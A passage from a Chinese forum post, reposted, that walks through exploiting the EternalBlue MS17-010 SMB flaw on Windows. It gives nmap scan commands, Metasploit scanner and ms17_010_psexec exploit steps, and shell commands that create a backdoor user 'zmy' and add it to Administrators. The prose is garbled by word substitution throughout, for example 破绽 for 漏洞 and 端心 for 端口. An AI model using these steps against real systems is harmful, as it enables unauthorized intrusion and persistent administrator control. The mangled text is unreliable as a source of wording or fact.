Eternal Blue永恒之蓝漏洞利用--洪水猛兽

闲聊 闲聊 1241 人阅读 | 0 人回复

<
Eternal Blue永久之蓝破绽操纵

0x01 破绽引见
甚么是永久之蓝破绽:歹意代码操纵Windows体系的SMB破绽能够获得体系最下权限。徒弟们扫描开放445(文件及挨印机同享)端心的Windows效劳器,对该破绽停止操纵后无需用户任何操纵,只需开机上彀,便可背目的靶机植进长途掌握木马,歹意插件等。哎呀实在便是那个没有要脸的勒索病毒本型。
0x02 端心扫描
利用nmap对靶机停止端心扫描探测445端心能否开启:nmap -sS 靶机IP
0x03 破绽扫描
思绪一:nmap剧本定面扫描:nmap --script=smb-vuln-ms17-010 靶机IP
思绪两:msf剧本定面扫描:1.use auxiliary/scanner/smb/smb_ms17_010;
2.set RHOST 靶机IP;
3. set THREADS 10(整快面);
4.exploit;
注:闭了您那个防水墙
扫出去有破绽便是如许的:
150157nuh227nyu7lzge7s.png

0x04 破绽进犯
利用msf中现成的exp进犯便可:
1.use exploit/windows/smb/ms17_010_psexec;
2.show options;
3.set RHOSTS 靶机IP;
4.exoloit冲;
注:别记把收集整大白女的
胜利以后是如许的:
150157yyoqh87ttw71tq0t.jpg

0x05 提权
利用正在内乱存中混合的shell ,meterpreter停止新建用户并提权操纵:
1.shell;
2.whoami;
3.net user zmy zmy /add;
4.net localgroup Administrators zmy /add;
150158g5v32jtuz3g01mmq.jpg

胜利脱上小马甲,提权胜利可以使用新建的用户停止后绝操纵了:
150158s880qqi7u8y7rggz.jpg

后绝?后绝便出了本人渐渐悟吧,拿key闪人:)

免责声明:假如进犯了您的权益,请联络站少,我们会实时删除侵权内乱容,感谢协作!
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请发帖留言提供原创证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
回复

使用道具 举报

 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则